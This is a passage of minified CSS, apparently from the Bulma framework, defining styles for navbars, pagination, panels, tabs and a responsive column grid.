2rem}.navbar.is-spaced .navbar-start,.navbar.is-spaced .navbar-end{align-items:center}.navbar.is-spaced a.navbar-item,.navbar.is-spaced .navbar-link{border-radius:4px}.navbar.is-transparent a.navbar-item:focus,.navbar.is-transparent a.navbar-item:hover,.navbar.is-transparent a.navbar-item.is-active,.navbar.is-transparent .navbar-link:focus,.navbar.is-transparent .navbar-link:hover,.navbar.is-transparent .navbar-link.is-active{background-color:transparent!important}.navbar.is-transparent .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus-within .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:hover .navbar-link{background-color:transparent!important}.navbar.is-transparent .navbar-dropdown a.navbar-item:focus,.navbar.is-transparent .navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar.is-transparent .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#485fc7}.navbar-burger{display:none}.navbar-item,.navbar-link{align-items:center;display:flex}.navbar-item.has-dropdown{align-items:stretch}.navbar-item.has-dropdown-up .navbar-link:after{transform:rotate(135deg) translate(.25em,-.25em)}.navbar-item.has-dropdown-up .navbar-dropdown{border-bottom:2px solid #dbdbdb;border-radius:6px 6px 0 0;border-top:none;bottom:100%;box-shadow:0 -8px 8px #0a0a0a1a;top:auto}.navbar-item.is-active .navbar-dropdown,.navbar-item.is-hoverable:focus .navbar-dropdown,.navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar-item.is-hoverable:hover .navbar-dropdown{display:block}.navbar.is-spaced .navbar-item.is-active .navbar-dropdown,.navbar-item.is-active .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:focus .navbar-dropdown,.navbar-item.is-hoverable:focus .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar-item.is-hoverable:focus-within .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:hover .navbar-dropdown,.navbar-item.is-hoverable:hover .navbar-dropdown.is-boxed{opacity:1;pointer-events:auto;transform:translateY(0)}.navbar-menu{flex-grow:1;flex-shrink:0}.navbar-start{justify-content:flex-start;margin-right:auto}.navbar-end{justify-content:flex-end;margin-left:auto}.navbar-dropdown{background-color:#fff;border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:2px solid #dbdbdb;box-shadow:0 8px 8px #0a0a0a1a;display:none;font-size:.875rem;left:0;min-width:100%;position:absolute;top:100%;z-index:20}.navbar-dropdown .navbar-item{padding:.375rem 1rem;white-space:nowrap}.navbar-dropdown a.navbar-item{padding-right:3rem}.navbar-dropdown a.navbar-item:focus,.navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#485fc7}.navbar.is-spaced .navbar-dropdown,.navbar-dropdown.is-boxed{border-radius:6px;border-top:none;box-shadow:0 8px 8px #0a0a0a1a,0 0 0 1px #0a0a0a1a;display:block;opacity:0;pointer-events:none;top:calc(100% - 4px);transform:translateY(-5px);transition-duration:86ms;transition-property:opacity,transform}.navbar-dropdown.is-right{left:auto;right:0}.navbar-divider{display:block}.navbar>.container .navbar-brand,.container>.navbar .navbar-brand{margin-left:-.75rem}.navbar>.container .navbar-menu,.container>.navbar .navbar-menu{margin-right:-.75rem}.navbar.is-fixed-bottom-desktop,.navbar.is-fixed-top-desktop{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-desktop{bottom:0}.navbar.is-fixed-bottom-desktop.has-shadow{box-shadow:0 -2px 3px #0a0a0a1a}.navbar.is-fixed-top-desktop{top:0}html.has-navbar-fixed-top-desktop,body.has-navbar-fixed-top-desktop{padding-top:3.25rem}html.has-navbar-fixed-bottom-desktop,body.has-navbar-fixed-bottom-desktop{padding-bottom:3.25rem}html.has-spaced-navbar-fixed-top,body.has-spaced-navbar-fixed-top{padding-top:5.25rem}html.has-spaced-navbar-fixed-bottom,body.has-spaced-navbar-fixed-bottom{padding-bottom:5.25rem}a.navbar-item.is-active,.navbar-link.is-active{color:#0a0a0a}a.navbar-item.is-active:not(:focus):not(:hover),.navbar-link.is-active:not(:focus):not(:hover){background-color:transparent}.navbar-item.has-dropdown:focus .navbar-link,.navbar-item.has-dropdown:hover .navbar-link,.navbar-item.has-dropdown.is-active .navbar-link{background-color:#fafafa}}.hero.is-fullheight-with-navbar{min-height:calc(100vh - 3.25rem)}.pagination{font-size:1rem;margin:-.25rem}.pagination.is-small{font-size:.75rem}.pagination.is-medium{font-size:1.25rem}.pagination.is-large{font-size:1.5rem}.pagination.is-rounded .pagination-previous,.pagination.is-rounded .pagination-next{padding-left:1em;padding-right:1em;border-radius:9999px}.pagination.is-rounded .pagination-link{border-radius:9999px}.pagination,.pagination-list{align-items:center;display:flex;justify-content:center;text-align:center}.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{font-size:1em;justify-content:center;margin:.25rem;padding-left:.5em;padding-right:.5em;text-align:center}.pagination-previous,.pagination-next,.pagination-link{border-color:#dbdbdb;color:#363636;min-width:2.5em}.pagination-previous:hover,.pagination-next:hover,.pagination-link:hover{border-color:#b5b5b5;color:#363636}.pagination-previous:focus,.pagination-next:focus,.pagination-link:focus{border-color:#485fc7}.pagination-previous:active,.pagination-next:active,.pagination-link:active{box-shadow:inset 0 1px 2px #0a0a0a33}.pagination-previous[disabled],.pagination-previous.is-disabled,.pagination-next[disabled],.pagination-next.is-disabled,.pagination-link[disabled],.pagination-link.is-disabled{background-color:#dbdbdb;border-color:#dbdbdb;box-shadow:none;color:#7a7a7a;opacity:.5}.pagination-previous,.pagination-next{padding-left:.75em;padding-right:.75em;white-space:nowrap}.pagination-link.is-current{background-color:#485fc7;border-color:#485fc7;color:#fff}.pagination-ellipsis{color:#b5b5b5;pointer-events:none}.pagination-list{flex-wrap:wrap}.pagination-list li{list-style:none}@media screen and (max-width: 768px){.pagination{flex-wrap:wrap}.pagination-previous,.pagination-next,.pagination-list li{flex-grow:1;flex-shrink:1}}@media screen and (min-width: 769px),print{.pagination-list{flex-grow:1;flex-shrink:1;justify-content:flex-start;order:1}.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{margin-bottom:0;margin-top:0}.pagination-previous{order:2}.pagination-next{order:3}.pagination{justify-content:space-between;margin-bottom:0;margin-top:0}.pagination.is-centered .pagination-previous{order:1}.pagination.is-centered .pagination-list{justify-content:center;order:2}.pagination.is-centered .pagination-next{order:3}.pagination.is-right .pagination-previous{order:1}.pagination.is-right .pagination-next{order:2}.pagination.is-right .pagination-list{justify-content:flex-end;order:3}}.panel{border-radius:6px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;font-size:1rem}.panel:not(:last-child){margin-bottom:1.5rem}.panel.is-white .panel-heading{background-color:#fff;color:#0a0a0a}.panel.is-white .panel-tabs a.is-active{border-bottom-color:#fff}.panel.is-white .panel-block.is-active .panel-icon{color:#fff}.panel.is-black .panel-heading{background-color:#0a0a0a;color:#fff}.panel.is-black .panel-tabs a.is-active{border-bottom-color:#0a0a0a}.panel.is-black .panel-block.is-active .panel-icon{color:#0a0a0a}.panel.is-light .panel-heading{background-color:#f5f5f5;color:#000000b3}.panel.is-light .panel-tabs a.is-active{border-bottom-color:#f5f5f5}.panel.is-light .panel-block.is-active .panel-icon{color:#f5f5f5}.panel.is-dark .panel-heading{background-color:#363636;color:#fff}.panel.is-dark .panel-tabs a.is-active{border-bottom-color:#363636}.panel.is-dark .panel-block.is-active .panel-icon{color:#363636}.panel.is-primary .panel-heading{background-color:#00d1b2;color:#fff}.panel.is-primary .panel-tabs a.is-active{border-bottom-color:#00d1b2}.panel.is-primary .panel-block.is-active .panel-icon{color:#00d1b2}.panel.is-link .panel-heading{background-color:#485fc7;color:#fff}.panel.is-link .panel-tabs a.is-active{border-bottom-color:#485fc7}.panel.is-link .panel-block.is-active .panel-icon{color:#485fc7}.panel.is-info .panel-heading{background-color:#3e8ed0;color:#fff}.panel.is-info .panel-tabs a.is-active{border-bottom-color:#3e8ed0}.panel.is-info .panel-block.is-active .panel-icon{color:#3e8ed0}.panel.is-success .panel-heading{background-color:#48c78e;color:#fff}.panel.is-success .panel-tabs a.is-active{border-bottom-color:#48c78e}.panel.is-success .panel-block.is-active .panel-icon{color:#48c78e}.panel.is-warning .panel-heading{background-color:#ffe08a;color:#000000b3}.panel.is-warning .panel-tabs a.is-active{border-bottom-color:#ffe08a}.panel.is-warning .panel-block.is-active .panel-icon{color:#ffe08a}.panel.is-danger .panel-heading{background-color:#f14668;color:#fff}.panel.is-danger .panel-tabs a.is-active{border-bottom-color:#f14668}.panel.is-danger .panel-block.is-active .panel-icon{color:#f14668}.panel-tabs:not(:last-child),.panel-block:not(:last-child){border-bottom:1px solid #ededed}.panel-heading{background-color:#ededed;border-radius:6px 6px 0 0;color:#363636;font-size:1.25em;font-weight:700;line-height:1.25;padding:.75em 1em}.panel-tabs{align-items:flex-end;display:flex;font-size:.875em;justify-content:center}.panel-tabs a{border-bottom:1px solid #dbdbdb;margin-bottom:-1px;padding:.5em}.panel-tabs a.is-active{border-bottom-color:#4a4a4a;color:#363636}.panel-list a{color:#4a4a4a}.panel-list a:hover{color:#485fc7}.panel-block{align-items:center;color:#363636;display:flex;justify-content:flex-start;padding:.5em .75em}.panel-block input[type=checkbox]{margin-right:.75em}.panel-block>.control{flex-grow:1;flex-shrink:1;width:100%}.panel-block.is-wrapped{flex-wrap:wrap}.panel-block.is-active{border-left-color:#485fc7;color:#363636}.panel-block.is-active .panel-icon{color:#485fc7}.panel-block:last-child{border-bottom-left-radius:6px;border-bottom-right-radius:6px}a.panel-block,label.panel-block{cursor:pointer}a.panel-block:hover,label.panel-block:hover{background-color:#f5f5f5}.panel-icon{display:inline-block;font-size:14px;height:1em;line-height:1em;text-align:center;vertical-align:top;width:1em;color:#7a7a7a;margin-right:.75em}.panel-icon .fa{font-size:inherit;line-height:inherit}.tabs{-webkit-overflow-scrolling:touch;align-items:stretch;display:flex;font-size:1rem;justify-content:space-between;overflow:hidden;overflow-x:auto;white-space:nowrap}.tabs a{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;color:#4a4a4a;display:flex;justify-content:center;margin-bottom:-1px;padding:.5em 1em;vertical-align:top}.tabs a:hover{border-bottom-color:#363636;color:#363636}.tabs li{display:block}.tabs li.is-active a{border-bottom-color:#485fc7;color:#485fc7}.tabs ul{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;display:flex;flex-grow:1;flex-shrink:0;justify-content:flex-start}.tabs ul.is-left{padding-right:.75em}.tabs ul.is-center{flex:none;justify-content:center;padding-left:.75em;padding-right:.75em}.tabs ul.is-right{justify-content:flex-end;padding-left:.75em}.tabs .icon:first-child{margin-right:.5em}.tabs .icon:last-child{margin-left:.5em}.tabs.is-centered ul{justify-content:center}.tabs.is-right ul{justify-content:flex-end}.tabs.is-boxed a{border:1px solid transparent;border-radius:4px 4px 0 0}.tabs.is-boxed a:hover{background-color:#f5f5f5;border-bottom-color:#dbdbdb}.tabs.is-boxed li.is-active a{background-color:#fff;border-color:#dbdbdb;border-bottom-color:transparent!important}.tabs.is-fullwidth li{flex-grow:1;flex-shrink:0}.tabs.is-toggle a{border-color:#dbdbdb;border-style:solid;border-width:1px;margin-bottom:0;position:relative}.tabs.is-toggle a:hover{background-color:#f5f5f5;border-color:#b5b5b5;z-index:2}.tabs.is-toggle li+li{margin-left:-1px}.tabs.is-toggle li:first-child a{border-top-left-radius:4px;border-bottom-left-radius:4px}.tabs.is-toggle li:last-child a{border-top-right-radius:4px;border-bottom-right-radius:4px}.tabs.is-toggle li.is-active a{background-color:#485fc7;border-color:#485fc7;color:#fff;z-index:1}.tabs.is-toggle ul{border-bottom:none}.tabs.is-toggle.is-toggle-rounded li:first-child a{border-bottom-left-radius:9999px;border-top-left-radius:9999px;padding-left:1.25em}.tabs.is-toggle.is-toggle-rounded li:last-child a{border-bottom-right-radius:9999px;border-top-right-radius:9999px;padding-right:1.25em}.tabs.is-small{font-size:.75rem}.tabs.is-medium{font-size:1.25rem}.tabs.is-large{font-size:1.5rem}.column{display:block;flex-basis:0;flex-grow:1;flex-shrink:1;padding:.75rem}.columns.is-mobile>.column.is-narrow{flex:none;width:unset}.columns.is-mobile>.column.is-full{flex:none;width:100%}.columns.is-mobile>.column.is-three-quarters{flex:none;width:75%}.columns.is-mobile>.column.is-two-thirds{flex:none;width:66.6666%}.columns.is-mobile>.column.is-half{flex:none;width:50%}.columns.is-mobile>.column.is-one-third{flex:none;width:33.3333%}.columns.is-mobile>.column.is-one-quarter{flex:none;width:25%}.columns.is-mobile>.column.is-one-fifth{flex:none;width:20%}.columns.is-mobile>.column.is-two-fifths{flex:none;width:40%}.columns.is-mobile>.column.is-three-fifths{flex:none;width:60%}.columns.is-mobile>.column.is-four-fifths{flex:none;width:80%}.columns.is-mobile>.column.is-offset-three-quarters{margin-left:75%}.columns.is-mobile>.column.is-offset-two-thirds{margin-left:66.6666%}.columns.is-mobile>.column.is-offset-half{margin-left:50%}.columns.is-mobile>.column.is-offset-one-third{margin-left:33.3333%}.columns.is-mobile>.column.is-offset-one-quarter{margin-left:25%}.columns.is-mobile>.column.is-offset-one-fifth{margin-left:20%}.columns.is-mobile>.column.is-offset-two-fifths{margin-left:40%}.columns.is-mobile>.column.is-offset-three-fifths{margin-left:60%}.columns.is-mobile>.column.is-offset-four-fifths{margin-left:80%}.columns.is-mobile>.column.is-0{flex:none;width:0%}.columns.is-mobile>.column.is-offset-0{margin-left:0%}.columns.is-mobile>.column.is-1{flex:none;width:8.33333%}.columns.is-mobile>.column.is-offset-1{margin-left:8.33333%}.columns.is-mobile>.column.is-2{flex:none;width:16.66667%}.columns.is-mobile>.column.is-offset-2{margin-left:16.66667%}.columns.is-mobile>.column.is-3{flex:none;width:25%}.columns.is-mobile>.column.is-offset-3{margin-left:25%}.columns.is-mobile>.column.is-4{flex:none;width:33.33333%}.columns.is-mobile>.column.is-offset-4{margin-left:33.33333%}.columns.is-mobile>.column.is-5{flex:none;width:41.66667%}.columns.is-mobile>.column.is-offset-5{margin-left:41.66667%}.columns.is-mobile>.column.is-6{flex:none;width:50%}.columns.is-mobile>.column.is-offset-6{margin-left:50%}.columns.is-mobile>.column.is-7{flex:none;width:58.33333%}.columns.is-mobile>.column.is-offset-7{margin-left:58.33333%}.columns.is-mobile>.column.is-8{flex:none;width:66.66667%}.columns.is-mobile>.column.is-offset-8{margin-left:66.66667%}.columns.is-mobile>.column.is-9{flex:none;width:75%}.columns.is-mobile>.column.is-offset-9{margin-left:75%}.columns.is-mobile>.column.is-10{flex:none;width:83.33333%}.columns.is-mobile>.column.is-offset-10{margin-left:83.33333%}.columns.is-mobile>.column.is-11{flex:none;width:91.66667%}.columns.is-mobile>.column.is-offset-11{margin-left:91.66667%}.columns.is-mobile>.column.is-12{flex:none;width:100%}.columns.is-mobile>.column.is-offset-12{margin-left:100%}@media screen and (max-width: 768px){.column.is-narrow-mobile{flex:none;width:unset}.column.is-full-mobile{flex:none;width:100%}.column.is-three-quarters-mobile{flex:none;width:75%}.column.is-two-thirds-mobile{flex:none;width:66.6666%}.column.is-half-mobile{flex:none;width:50%}.column.is-one-third-mobile{flex:none;width:33.3333%}.column.is-one-quarter-mobile{flex:none;width:25%}.column.is-one-fifth-mobile{flex:none;width:20%}.column.is-two-fifths-mobile{flex:none;width:40%}.column.is-three-fifths-mobile{flex:none;width:60%}.column.is-four-fifths-mobile{flex:none;width:80%}.column.is-offset-three-quarters-mobile{margin-left:75%}.column.is-offset-two-thirds-mobile{margin-left:66.6666%}.column.is-offset-half-mobile{margin-left:50%}.column.is-offset-one-third-mobile{margin-left:33.3333%}.column.is-offset-one-quarter-mobile{margin-left:25%}.column.is-offset-one-fifth-mobile{margin-left:20%}.column.is-offset-two-fifths-mobile{margin-left:40%}.column.is-offset-three-fifths-mobile{margin-left:60%}.column.is-offset-four-fifths-mobile{margin-left:80%}.column.is-0-mobile{flex:none;width:0%}.column.is-offset-0-mobile{margin-left:0%}.column.is-1-mobile{flex:none;width:8.33333%}.column.is-offset-1-mobile{margin-left:8.33333%}.column.is-2-mobile{flex:none;width:16.66667%}.column.is-offset-2-mobile{margin-left:16.66667%}.column.is-3-mobile{flex:none;width:25%}.column.is-offset-3-mobile{margin-left:25%}.column.is-4-mobile{flex:none;width:33.33333%}.column.is-offset-4-mobile{margin-left:33.33333%}.column.is-5-mobile{flex:none;width:41.66667%}.column.is-offset-5-mobile{margin-left:41.66667%}.column.is-6-mobile{flex:none;width:50%}.column.is-offset-6-mobile{margin-left:50%}.column.is-7-mobile{flex:none;width:58.33333%}.column.is-offset-7-mobile{margin-left:58.33333%}.column.is-8-mobile{flex:none;width:66.66667%}.column.is-offset-8-mobile{margin-left:66.66667%}.column.is-9-mobile{flex:none;width:75%}.column.is-offset-9-mobile{margin-left:75%}.column.is-10-mobile{flex:none;width:83.33333%}.column.is-offset-10-mobile{margin-left:83.33333%}.column.is-11-mobile{flex:none;width:91.66667%}.column.is-offset-11-mobile{margin-left:91.66667%}.column.is-12-mobile{flex:none;width:100%}.column.is-offset-12-mobile{margin-left:100%}}@media screen and (min-width: 769px),print{.column.is-narrow,.column.is-narrow-tablet{flex:none;width:unset}.column.is-full,.column.is-full-tablet{flex:none;width:100%}.column.is-three-quarters,.column.is-three-quarters-tablet{flex:none;width:75%}.column.is-two-thirds,.column.is-two-thirds-tablet{flex:none;width:66.6666%}.column.is-half,.column.is-half-tablet{flex:none;width:50%}.column.is-one-third,.column.is-one-third-tablet{flex:none;width:33.3333%}.column.is-one-quarter,.column.is-one-quarter-tablet{flex:none;width:25%}.column.is-one-fifth,.column.is-one-fifth-tablet{flex:none;width:20%}.column.is-two-fifths,.column.is-two-fifths-tablet{flex:none;width:40%}.column.is-three-fifths,.column.is-three-fifths-tablet{flex:none;width:60%}.column.is-four-fifths,.column.is-four-fifths-tablet{flex:none;width:80%}.column.is-offset-three-quarters,.column.is-offset-three-quarters-tablet{margin-left:75%}.column.is-offset-two-thirds,.column.is-offset-two-thirds-tablet{margin-left:66.6666%}.column.is-offset-half,.column.is-offset-half-tablet{margin-left:50%}.column.is-offset-one-third,.column.is-offset-one-third-tablet{margin-left:33.3333%}.column.is-offset-one-quarter,.column.is-offset-one-quarter-tablet{margin-left:25%}.column.is-offset-one-fifth,.column.is-offset-one-fifth-tablet{margin-left:20%}.column.is-offset-two-fifths,.column.is-offset-two-fifths-tablet{margin-left:40%}.column.is-offset-three-fifths,.column.is-offset-three-fifths-tablet{margin-left:60%}.column.is-offset-four-fifths,.column.is-offset-four-fifths-tablet{margin-left:80%}.column.is-0,.column.is-0-tablet{flex:none;width:0%}.column.is-offset-0,.column.is-offset-0-tablet{margin-left:0%}.column.is-1,.column.is-1-tablet{flex:none;width:8.33333%}.column.is-offset-1,.column.is-offset-1-tablet{margin-left:8.33333%}.column.is-2,.column.is-2-tablet{flex:none;width:16.66667%}.column.is-offset-2,.column.is-offset-2-tablet{margin-left:16.66667%}.column.is-3,.column.is-3-tablet{flex:none;width:25%}.column.is-offset-3,.column.is-offset-3-tablet{margin-left:25%}.column.is-4,.column.is-4-tablet{flex:none;width:33.33333%}.column.is-offset-4,.column.is-offset-4-tablet{margin-left:33.33333%}.column.is-5,.column.is-5-tablet{flex:none;width:41.66667%}.column.is-offset-5,.column.is-offset-5-tablet{margin-left:41.66667%}.column.is-6,.column.is-6-tablet{flex:none;width:50%}.column.is-offset-6,.column.is-offset-6-tablet{margin-left:50%}.column.is-7,.column.is-7-tablet{flex:none;width:58.33333%}.column.is-offset-7,.column.is-offset-7-tablet{margin-left:58.33333%}.column.is-8,.column.is-8-tablet{flex:none;width:66.66667%}.column.is-offset-8,.column.is-offset-8-tablet{margin-left:66.66667%}.column.is-9,.column.is-9-tablet{flex:none;width:75%}.column.is-offset-9,.column.is-offset-9-tablet{margin-left:75%}.column.is-10,.column.is-10-tablet{flex:none;width:83.33333%}.column.is-offset-10,.column.is-offset-10-tablet{margin-left:83.33333%}.column.is-11,.column.is-11-tablet{flex:none;width:91.66667%}.column.is-offset-11,.column.is-offset-11-tablet{margin-left:91.66667%}.column.is-12,.column.is-12-tablet{flex:none;width:100%}.column.is-offset-12,.column.is-offset-12-tablet{margin-left:100%}}@media screen and (max-width: 1023px){.column.is-narrow-touch{flex:none;width:unset}.column.is-full-touch{flex:none;width:100%}.column.is-three-quarters-touch{flex:none;width:75%}.column.is-two-thirds-touch{flex:none;width:66.6666%}.column.is-half-touch{flex:none;width:50%}.column.is-one-third-touch{flex:none;width:33.3333%}.column.is-one-quarter-touch{flex:none;width:25%}.column.is-one-fifth-touch{flex:none;width:20%}.column.is-two-fifths-touch{flex:none;width:40%}.column.is-three-fifths-touch{flex:none;width:60%}.column.is-four-fifths-touch{flex:none;width:80%}.column.is-offset-three-quarters-touch{margin-left:75%}.column.is-offset-two-thirds-touch{margin-left:66.6666%}.column.is-offset-half-touch{margin-left:50%}.column.is-offset-one-third-touch{margin-left:33.3333%}.column.is-offset-one-quarter-touch{margin-left:25%}.column.is-offset-one-fifth-touch{margin-left:20%}.column.is-offset-two-fifths-touch{margin-left:40%}.column.is-offset-three-fifths-touch{margin-left:60%}.column.is-offset-four-fifths-touch{margin-left:80%}.column.is-0-touch{flex:none;width:0%}.column.is-offset-0-touch{margin-left:0%}.column.is-1-touch{flex:none;width:8.33333%}.column.is-offset-1-touch{margin-left:8.33333%}.column.is-2-touch{flex:none;width:16.66667%}.column.is-offset-2-touch{margin-left:16.66667%}.column.is-3-touch{flex:none;width:25%}.column.is-offset-3-touch{margin-left:25%}.column.is-4-touch{flex:none;width:33.33333%}.column.is-offset-4-touch{margin-left:33.33333%}.column.is-5-touch{flex:none;width:41.66667%}.column.is-offset-5-touch{margin-left:41.66667%}.column.is-6-touch{flex:none;width:50%}.column.is-offset-6-touch{margin-left:50%}.column.is-7-touch{flex:none;width:58.33333%}.column.is-offset-7-touch{margin-left:58.33333%}.column.is-8-touch{flex:none;width:66.66667%}.column.is-offset-8-touch{margin-left:66.66667%}.column.is-9-touch{flex:none;width:75%}.column.is-offset-9-touch{margin-left:75%}.column.is-10-touch{flex:none;width:83.33333%}.column.is-offset-10-touch{margin-left:83.33333%}.column.is-11-touch{flex:none;width:91.66667%}.column.is-offset-11-touch{margin-left:91.66667%}.column.is-12-touch{flex:none;width:100%}.column.is-offset-12-touch{margin-left:100%}}@media screen and (min-width: 1024px){.column.is-narrow-desktop{flex:none;width:unset}.column.is-full-desktop{flex:none;width:100%}.column.is-three-quarters-desktop{flex:none;width:75%}.column.is-two-thirds-desktop{flex:none;width:66.6666%}.column.is-half-desktop{flex:none;width:50%}.column.is-one-third-desktop{flex:none;width:33.3333%}.column.is-one-quarter-desktop{flex:none;width:25%}.column.is-one-fifth-desktop{flex:none;width:20%}.column.is-two-fifths-desktop{flex:none;width:40%}.column.is-three-fifths-desktop{flex:none;width:60%}.column.is-four-fifths-desktop{flex:none;width:80%}.column.is-offset-three-quarters-desktop{margin-left:75%}.column.is-offset-two-thirds-desktop{margin-left:66.6666%}.column.is-offset-half-desktop{margin-left:50%}.column.is-offset-one-third-desktop{margin-left:33.3333%}.column.is-offset-one-quarter-desktop{margin-left:25%}.column.is-offset-one-fifth-desktop{margin-left:20%}.column.is-offset-two-fifths-desktop{margin-left:40%}.column.is-offset-three-fifths-desktop{margin-left:60%}.column.is-offset-four-fifths-desktop{margin-left:80%}.column.is-0-desktop{flex:none;width:0%}.column.is-offset-0-desktop{margin-left:0%}.column.is-1-desktop{flex:none;width:8.33333%}.column.is-offset-1-desktop{margin-left:8.33333%}.column.is-2-desktop{flex:none;width:16.66667%}.column.is-offset-2-desktop{margin-left:16.66667%}.column.is-3-desktop{flex:none;width:25%}.column.is-offset-3-desktop{margin-left:25%}.column.is-4-desktop{flex:none;width:33.33333%}.column.is-offset-4-desktop{margin-left:33.33333%}.column.is-5-desktop{flex:none;width:41.66667%}.column.is-offset-5-desktop{margin-left:41.66667%}.column.is-6-desktop{flex:none;width:50%}.column.is-offset-6-desktop{margin-left:50%}.column.is-7-desktop{flex:none;width:58.33333%}.column.is-offset-7-desktop{margin-left:58.33333%}.column.is-8-desktop{flex:none;width:66.66667%}.column.is-offset-8-desktop{margin-left:66.66667%}.column.is-9-desktop{flex:none;width:75%}.column.is-offset-9-desktop{margin-left:75%}.column.is-10-desktop{flex:none;width:83.33333%}.column.is-offset-10-desktop{margin-left:83.33333%}.column.is-11-desktop{flex:none;width:91.66667%}.column.is-offset-11-desktop{margin-left:91.66667%}.column.is-12-desktop{flex:none;width:100%}.column.is-offset-12-desktop{margin-left:100%}}@media screen and (min-width: 1216px){.column.is-narrow-widescreen{flex:none;width:unset}.column.is-full-widescreen{flex:none;width:100%}.column.is-three-quarters-widescreen{flex:none;width:75%}.column.is-two-thirds-widescreen{flex:none;width:66.6666%}.column.is-half-widescreen{flex:none;width:50%}.column.is-one-third-widescreen{flex:none;width:33.3333%}.column.is-one-quarter-widescreen{flex:none;width:25%}.column.is-one-fifth-widescreen{flex:none;width:20%}.column.is-two-fifths-widescreen{flex:none;width:40%}.column.is-three-fifths-widescreen{flex:none;width:60%}.column.is-four-fifths-widescreen{flex:none;width:80%}.column.is-offset-three-quarters-widescreen{margin-left:75%}.column.is-offset-two-thirds-widescreen{margin-left:66.6666%}.column.is-offset-half-widescreen{margin-left:50%}.column.is-offset-one-third-widescreen{margin-left:33.3333%}.column.is-offset-one-quarter-widescreen{margin-left:25%}.column.is-offset-one-fifth-widescreen{margin-left:20%}.column.is-offset-two-fifths-widescreen{margin-left:40%}.column.is-offset-three-fifths-widescreen{margin-left:60%}.column.is-offset-four-fifths-widescreen{margin-left:80%}.column.is-0-widescreen{flex:none;width:0%}.column.is-offset-0-widescreen{margin-left:0%}.column.is-1-widescreen{flex:none;width:8.33333%}.column.is-offset-1-widescreen{margin-left:8.33333%}.column.is-2-widescreen{flex:none;width:16.66667%}.column.is-offset-2-widescreen{margin-left:16.66667%}.column.is-3-widescreen{flex:none;width:25%}.column.is-offset-3-widescreen{margin-left:25%}.column.is-4-widescreen{flex:none;width:33.33333%}.column.is-offset-4-widescreen{margin-left:33.33333%}.column.is-5-widescreen{flex:none;width:41.66667%}.column.is-offset-5-widescreen{margin-left:41.66667%}.column.is-6-widescreen{flex:none;width:50%}.column.is-offset-6-widescreen{margin-left:50%}.column.is-7-widescreen{flex:none;width:58.33333%}.column.is-offset-7-widescreen{margin-left:58.33333%}.column.is-8-widescreen{flex:none;width:66.66667%}.column.is-offset-8-widescreen{margin-left:66.66667%}.column.is-9-widescreen{flex:none;width:75%}.column.is-offset-9-widescreen{margin-left:75%}.column.is-10-widescreen{flex:none;width:83.33333%}.column.is-offset-10-widescreen{margin-left:83.33333%}.column.is-11-widescreen{flex:none;width:91.66667%}.column.is-offset-11-widescreen{margin-left:91.66667%}.column.is-12-widescreen{flex:none;width:100%}.column.is-offset-12-widescreen{margin-left:100%}}@media screen and (min-width: 1408px){.column.is-narrow-fullhd{flex:none;width:unset}.column.is-full-fullhd{flex:none;width:100%}.column.is-three-quarters-fullhd{flex:none;width:75%}.column.is-two-thirds-fullhd{flex:none;width:66.6666%}.column.is-half-fullhd{flex:none;width:50%}.column.is-one-third-fullhd{flex:none;width:33.3333%}.column.is-one-quarter-fullhd{flex:none;width:25%}.column.is-one-fifth-fullhd{flex:none;width:20%}.column.is-two-fifths-fullhd{flex:none;width:40%}.column.is-three-fifths-fullhd{flex:none;width:60%}.column.is-four-fifths-fullhd{flex:none;width:80%}.column.is-offset-three-quarters-fullhd{margin-left:75%}.column.is-offset-two-thirds-fullhd{margin-left:66.6666%}.column.is-offset-half-fullhd{margin-left:50%}.column.is-offset-one-third-fullhd{margin-left:33.3333%}.column.is-offset-one-quarter-fullhd{margin-left:25%}.column.is-offset-one-fifth-fullhd{margin-left:20%}.column.is-offset-two-fifths-fullhd{margin-left:40%}.column.is-offset-three-fifths-fullhd{margin-left:60%}.column.is-offset-four-fifths-fullhd{margin-left:80%}.column.is-0-fullhd{flex:none;width:0%}.column.is-offset-0-fullhd{margin-left:0%}.column.is-1-fullhd{flex:none;width:8.33333%}.column.is-offset-1-fullhd{margin-left:8.33333%}.column.is-2-fullhd{flex:none;width:16.66667%}.column.is-offset-2-fullhd{margin-left:16.66667%}.column.is-3-fullhd{flex:none;width:25%}.column.is-offset-3-fullhd{margin-left:25%}.column.is-4-fullhd{flex:none;width:33.33333%}.column.is-offset-4-fullhd{margin-left:33.33333%}.column.is-5-fullhd{flex:none;width:41.66667%}.column.is-offset-5-fullhd{margin-left:41.66667%}.column.is-6-fullhd{flex:none;width:50%}.column.is-offset-6-fullhd{margin-left:50%}.column.is-7-fullhd{flex:none;width:58.33333%}.column.is-offset-7-fullhd{margin-left:58.33333%}.column.is-8-fullhd{flex:none;width:66.66667%}.column.is-offset-8-fullhd{margin-left:66.66667%}.column.is-9-fullhd{flex:none;width:75%}.column.is-offset-9-fullhd{margin-left:75%}.column.is-10-fullhd{flex:none;width:83.33333%}.column.is-offset-10-fullhd{margin-left:83.33333%}.column.is-11-fullhd{flex:none;width:91.66667%}.column.is-offset-11-fullhd{margin-left:91.66667%}.column.is-12-fullhd{flex:none;width:100%}.column.is-offset-12-fullhd{margin-left:100%}}.columns{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.columns:last-child{margin-bottom:-.75rem}.columns:not(:last-child){margin-bottom:.75rem}